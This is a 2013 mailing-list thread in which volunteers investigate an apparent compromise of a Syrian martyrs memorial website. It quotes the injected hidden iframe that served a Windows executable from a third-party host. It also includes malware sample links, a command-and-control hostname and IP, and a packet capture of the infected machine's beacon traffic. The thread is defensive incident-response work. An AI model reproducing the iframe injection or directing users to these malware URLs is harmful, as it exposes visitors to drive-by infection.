[liberationtech] Syrian-martyrs.com website probably compromised by virus

Tue Jan 29 18:02:00 PST 2013

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Ok. I infected an old Windoes xp with this malware and it keeps
sending SYN requests to this hostname: awrasx10.no-ip.biz which
currently resolved to: 37.236.124.197 and is down for me.

- --SiNA
Internet Protocol Version 4, Src: 10.10.10.17 (10.10.10.17), Dst:
37.236.124.197 (37.236.124.197)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN:
0x00: Not-ECT (Not ECN-Capable Transport))
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..00 = Explicit Congestion Notification: Not-ECT (Not
ECN-Capable Transport) (0x00)
    Total Length: 48
    Identification: 0x06b0 (1712)
    Flags: 0x02 (Don't Fragment)
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x3d4c [correct]
        [Good: True]
        [Bad: False]
    Source: 10.10.10.17 (10.10.10.17)
    Destination: 37.236.124.197 (37.236.124.197)
Transmission Control Protocol, Src Port: llsurfup-https (1184), Dst
Port: distinct (9999), Seq: 0, Len: 0
    Source port: llsurfup-https (1184)
    Destination port: distinct (9999)
    [Stream index: 2258]
    Sequence number: 0    (relative sequence number)
    Header length: 28 bytes
    Flags: 0x002 (SYN)
    Window size value: 65535
    [Calculated window size: 65535]
    Checksum: 0xdc28 [validation disabled]
    Options: (8 bytes)

Andrew Lewis:
> Just a heads up the sites been taken down, malware is here: 
> https://resources.telecomix.ceops.eu/material/malwares/
> 
> Also looking at getting access to the server in question for
> forensics.
> 
> -Andrew
> 
> 
> On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <sina at redteam.io>
> wrote:
> 
> This is the malware:
> 
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>
> 
> 
> 
> --SiNA
> 
> 
> 
> SiNA
> 
> 
> Rabbani:
> 
> holly shit:
> 
> 
> <iframe name="I1" width="10" height="10"
> 
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>
> 
> 
> 
> border="0"
> 
> frameborder="0">
> 
> 
> 
> :/ if you are running windows don't even go there!!!
> 
> 
> 
> Andrew Lewis:
> 
> I can get to this in 6 hours or so, maybe someone is willing to
> 
> jump on this before then?
> 
> 
> -Andrew
> 
> 
> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
> 
> Dear Libtech,
> 
> 
> We just saw that the website : http://www.syrian-martyrs.com
> 
> is probably compromised. Every page of the website contains an
> 
> iFrame which links to a .exe file which is detected as a virus
> 
> by antivirus software:
> 
> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
> 
> 
> 
> 
> 
> 
> The fact that the HTML code is present at the bottom of each page
> makes
> 
> me think that the "index.php" page has been changed in a way
> 
> that makes that iFrame appear on every page of the website,
> 
> after the dynamic content.
> 
> 
> It also probably means that the attackers have some kind of
> 
> access to the server. My guess would be going to a PHP shell,
> 
> but I'm no expert in this.
> 
> 
> Any help, clue, investigation, would be very welcome :)
> 
> 
> Thank you, KheOps
> 
> 
> -- Unsubscribe, change to digest, or change password at:
> 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> -- Unsubscribe, change to digest, or change password at:
> 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> 
> 
> 
> -- Unsubscribe, change to digest, or change password at: 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> -- Unsubscribe, change to digest, or change password at:
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 

- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRCH8TAAoJEDxieAEiLOmoWZkP+gOWJ/v/1Z0PnFBcEQ6Qrd+m
cCYwqWQObaDCQeOPYOHBTX96FhHfNqUW2FgLryQPi42Vg2jqB0XFs6rTwE1o8/bE
ruqlo7F4PSNEiH3+MzcXSX+adUhzQ0IlCHfQC9LWRWtL7A6EMNh7z6nqtT//9b0H
F/y/1WpLUF3eLse0+P8BBd9sNYocpua0GZkQpI0YmI2vxbBPgy+Hmem7lHAq0oea
Di4klLeYz/I/gVK1JDNrmwZTNm13i2fI9r9lmmn1R4anH4CCDWCaT9xBOdRqXhUW
Uw2jti0Po7uls7wiTmeYddb03PG37qN52G0LnqO36JJrA04066tTtbmzYbrabCSr
fawb7AdrPZyJX1lOA8lVSUj978Fyk36ZJyyqYp0FywdNt+/UPbEuWDAG58EkqwiN
m/y9TI1ZHCodY7WfW9OZXO89qCo1UPv/MPXKa/BDoXoMEgOW0SzAnrUwkWZNH+WI
v2GwePO1tpLJxVWOq0zDUqD+1esF7J4msnfGieYejZOIY+1Ki52xRn5vRuu59QRs
ZKPq6+lTmxV8RZlxcTfe6CULO20uxkakZShzHTUC3oDIgYjiuwyiNwNf3nxL8Z9c
du91OTkfQHbRmq5Th9D1ilmu2+VOZrEtlsmhDEYPFalD1DZ32ywkg4hn8eniBU1/
QmCZ9zpzBw/62ovckzzB
=omeO
-----END PGP SIGNATURE-----